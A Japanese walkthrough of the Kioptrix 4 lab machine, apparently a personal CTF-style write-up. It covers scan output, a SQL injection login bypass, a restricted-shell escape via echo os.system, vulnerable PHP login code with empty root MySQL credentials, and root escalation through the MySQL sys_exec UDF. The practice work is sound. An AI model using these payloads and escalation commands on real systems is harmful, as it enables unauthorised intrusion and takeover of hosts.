+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8672 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2020-04-29 03:56:51 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.6
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Apr 29 03:58:08 2020
URL_BASE: http://10.10.10.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.6/ ----
+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:325)
==> DIRECTORY: http://10.10.10.6/images/
+ http://10.10.10.6/index (CODE:200|SIZE:1255)
+ http://10.10.10.6/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://10.10.10.6/john/
+ http://10.10.10.6/logout (CODE:302|SIZE:0)
+ http://10.10.10.6/member (CODE:302|SIZE:220)
+ http://10.10.10.6/server-status (CODE:403|SIZE:330)
---- Entering directory: http://10.10.10.6/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.6/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Apr 29 03:58:10 2020
DOWNLOADED: 4612 - FOUND: 6
とりあえず、「http://10.10.10.6」へ接続するとログインフォームが現れる。
UsernameとPasswordに「'」シングルクォーテーションを入力したりしてみると、Passwordに「'」が入った時にエラーを吐く。
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28
Usernameは適当に入れといて、PasswordにSQLiしたらログインできるかもしれない。
「'or 1=1 or ''='」等,Passwordに入力すると
User admin Oups, something went wrong with your member's page account. Please contact your local Administrator to fix the issue.
と出るが、ログインはできていない。
そういえば、「dirb」の探索で「john」ってあったな。
Username「john」,Password「'or 1=1 or ''='」を入力してみた。
Member's Control Panel Username : john Password : MyNameIsJohn
ログイン成功した模様。
とりあえず、他のファイルも見てみる。
/images/に目ぼしいものはない。
/john/には、「john.php」という謎phpがある。
アクセスすると、ログインフォームが同じく表示され、「index.php」と同様にログインを確認した。
johnでssh接続可能か試す。
# ssh john@10.10.10.6 john@10.10.10.6's password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ help cd clear echo exit help ll lpath ls john:~$ cd ../ *** forbidden path -> "/home/" *** You have 0 warning(s) left, before getting kicked out. This incident has been reported. john:~$ ls ../ *** forbidden path -> "/home/" *** Kicked out Connection to 10.10.10.6 closed.
johnは使用可能なコマンドが制限されていて、さらに違反するとコネクションが切断されるようだ。
echoで違うshell呼び出せばいいじゃん。
参考
SANS Cyber Security Certifications & Research
Spawning a TTY Shell
ということで、rlwrapもつけてやる。
# rlwrap ssh john@10.10.10.6
john@10.10.10.6's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd clear echo exit help ll lpath ls
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
では、shell取れたのでrootへの道を探す。
とりあえず、webサイトの先ほど見れてないファイルでも見に行くか。
john@Kioptrix4:~$ cd /var/www/ john@Kioptrix4:/var/www$ ls checklogin.php database.sql images index.php john login_success.php logout.php member.php robert
いっぱいの順に見ていく。
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>
早速良さそうなの引いた?
始めの部分にmysqlのログイン情報書いてある。
これはつまり、mysqlがroot権限で動いているということでは
次の記事で( ゚д゚)ハッ!っとなった。
Command execution with a MySQL UDF | Bernardo Dag
MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux
SQLにUDFなんてものがあったのか。
まず、
john@Kioptrix4:/var/www$ whereis lib_mysqludf_sys lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
あるということは....
つまり......
john@Kioptrix4:/var/www$ mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 71
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select sys_exec('id > /tmp/id.txt');
+------------------------------+
| sys_exec('id > /tmp/id.txt') |
+------------------------------+
| NULL |
+------------------------------+
1 row in set (0.01 sec)
mysql> select sys_exec('chmod 777 /tmp/id.txt');
+-----------------------------------+
| sys_exec('chmod 777 /tmp/id.txt') |
+-----------------------------------+
| NULL |
+-----------------------------------+
1 row in set (0.01 sec)
mysql> exit
Bye
john@Kioptrix4:/var/www$ cat /tmp/id.txt
uid=0(root) gid=0(root)
!!!!!!
john@Kioptrix4:~$ cat /etc/group
john@Kioptrix4:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:loneferret
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:loneferret
fax:x:21:
voice:x:22:
cdrom:x:24:loneferret
floppy:x:25:loneferret
tape:x:26:
sudo:x:27:
audio:x:29:loneferret
dip:x:30:loneferret
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:loneferret
sasl:x:45:
plugdev:x:46:loneferret
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
dhcp:x:102:
syslog:x:103:
klog:x:104:
scanner:x:105:
nvram:x:106:
fuse:x:107:loneferret
mysql:x:108:
crontab:x:109:
mlocate:x:110:
ssh:x:111:
sambashare:x:112:loneferret
winbindd_priv:x:113:
loneferret:x:1000:
lpadmin:x:114:loneferret
admin:x:115:loneferret,john
john:x:1001:
robert:x:1002:
john@Kioptrix4:~$ mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select sys_exec("usermod -aG admin john");
+------------------------------------+
| sys_exec("usermod -aG admin john") |
+------------------------------------+
| NULL |
+------------------------------------+
1 row in set (0.05 sec)
mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john:
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:~# cd /root/
root@Kioptrix4:~# ls
congrats.txt lshell-0.9.12
root@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
rootのパスワード消してsshログインしてみようと思ったけど、公開鍵がなんたらと言われてしまった。
adminグループにjohnを追加してrootになるのが一番楽?
「/etc/sudoers」に「john ALL=(ALL) ALL」追加でも良い?
root権限で作業して権限変える系なら色々手段ありそう。
Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Sambaの精確なバージョンチェックをする。
自分の環境だとなぜか「smbclient」も「enum4linux」が使えないので、metasploit使うしかないと思っている。
msf5 > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) msf5 auxiliary(scanner/smb/smb_version) > set rhosts 10.10.10.6 rhosts => 10.10.10.6 msf5 auxiliary(scanner/smb/smb_version) > run [*] 10.10.10.6:445 - Host could not be identified: Unix (Samba 3.0.28a) [*] 10.10.10.6:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/smb/smb_version) > exit
うむ、分からん。
終わり
「chmod u+s /bin/(ba)sh」した場合のroot以外から、/bin/(ba)sh起動した場合はroot奪取と言えるか問題。
smbclientもenum4linuxも上手く動いてくれない問題。
